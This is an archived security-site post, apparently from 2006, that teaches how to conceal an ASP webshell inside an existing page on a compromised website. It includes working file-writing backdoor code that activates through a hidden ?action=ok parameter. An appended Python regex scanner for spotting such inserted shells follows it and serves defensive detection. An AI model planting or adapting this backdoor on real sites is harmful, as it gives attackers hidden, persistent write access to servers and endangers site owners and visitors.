Covert insertion-type ASP Trojan - vulnerability warning - the black bar safety net

2006-03-11T00:00:00
ID MYHACK58:6220067833
Type myhack58
Reporter Anonymous
Modified 2006-03-11T00:00:00

Description

Once you have a webshell on a website, it is useless if the administrator finds it: it gets deleted. Administrators are not fools, so we have to hide our webshell. Below are several ways of inserting a trojan into an ASP file that are not easy to spot. I got a webshell to do the demo for everyone. First, we just pick an ASP file that we want to tamper with.

1. In the ASP file we are tampering with, add the following content:

<% if request(action)=ok then %>
##################################
<% end if %>

Where the ######### is, add your shell code. The code I have provided is the newmm.asp Trojan (encrypted code); everyone is familiar with it, and I analyzed it in my previous tutorial.

<% if request(action)=ok then %>
<%dim objFSO%>
<%dim fdata%>
<%dim objCountFile%>
<%on error resume next%>
<%Set objFSO = Server.CreateObject(Scripting.FileSystemObject)%>
<%if Trim(request(syfdpath))<> then%>
<%fdata = request(cyfddata)%>
<%Set objCountFile=objFSO.CreateTextFile(request(syfdpath),True)%>
<%objCountFile.Write fdata%>
<%if err =0 then%>
<%response.write <font color=red>save Success!</font>%>
<%else%>
<%response.write <font color=red>Save UnSuccess!</font>%>
<%end if%>
<%err.clear%>
<%end if%>
<%objCountFile.Close%>
<%Set objCountFile=Nothing%>
<%Set objFSO = Nothing%>
<%Response.write <form action= method=post>%>
<%Response.write to save the file<font color=red>the absolute path(including the file name:D:\web\x.asp):</font>%>
<%Response.Write <input type=text name=syfdpath width=32 size=50>%>
<%Response.Write <br>%>
<%Response.write this document absolute path%>
<%=server.mappath(Request.ServerVariables(SCRIPT_NAME))%>
<%Response.write <br>%>
<%Response.write the contents of the input:%>
<%Response.write <textarea name=cyfddata cols=80 rows=10 width=32></textarea>%>
<%Response.write <input type=submit value=save>%>
<%Response.write </form>%>
<% end if%>

Once this is added, normal browsing of the page is not affected. Append ?action=ok to the ASP file you tampered with, for example index.asp?action=ok, and the shell comes up, without affecting normal browsing. There, everyone sees it.
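Because the inserted block hides inside a legitimate page, it is found by reading the page source rather than by looking for an unfamiliar file. The Python sketch below is an added example, not code from the original post: the rule names, the `scan_asp` and `verdict` functions and both sample pages are constructed for illustration, and the suspect sample reuses only lines printed above.

```python
import re

# Heuristics for the pattern on this page: a request-parameter gate wrapping
# FileSystemObject code that writes to a request-supplied path. Quotes are
# optional in every rule so the page's own (unquoted) rendering also matches.
REQ = r'request(?:\.(?:form|querystring))?\s*\(\s*"?\w+"?\s*\)'
RULES = {
    "param_gate": re.compile(r'<%\s*if\s+' + REQ + r'\s*=\s*"?\w+"?\s*then', re.I),
    "fso_create": re.compile(r'createobject\s*\(\s*"?scripting\.filesystemobject"?\s*\)', re.I),
    "request_path_write": re.compile(r'createtextfile\s*\(\s*(?:(' + REQ + r')|(\w+))', re.I),
    "error_suppression": re.compile(r'on\s+error\s+resume\s+next', re.I),
}
ASSIGN = re.compile(r'(\w+)\s*=\s*' + REQ, re.I)  # variables filled from the request

# Constructed sample, reduced to lines as the page prints them.
SUSPECT = """<!-- normal index.asp markup -->
<% if request(action)=ok then %>
<%on error resume next%>
<%Set objFSO = Server.CreateObject(Scripting.FileSystemObject)%>
<%Set objCountFile=objFSO.CreateTextFile(request(syfdpath),True)%>
<% end if %>"""
# Constructed benign page: FSO write to a fixed path, no request-driven gate.
BENIGN = """<% Set fso = Server.CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile("D:\\logs\\hits.txt", True) %>"""


def scan_asp(source):
    """Return the sorted names of the rules that fire on one ASP file's text."""
    tainted = {m.group(1).lower() for m in ASSIGN.finditer(source)}
    hits = set()
    for name, rx in RULES.items():
        for m in rx.finditer(source):
            # A path argument counts only if it is the request itself or a
            # variable that was assigned from the request.
            if (name == "request_path_write" and not m.group(1)
                    and m.group(2).lower() not in tainted):
                continue
            hits.add(name)
    return sorted(hits)


def verdict(source):
    """'high': hidden gate plus request-controlled write; 'review': write only."""
    hits = scan_asp(source)
    if "request_path_write" in hits and "param_gate" in hits:
        return "high"
    return "review" if "request_path_write" in hits else "clean"
```

Treat a hit as a prompt to diff the file against a known-good copy. Encoded script, such as the encrypted variant the post mentions, will not match these plain-text rules.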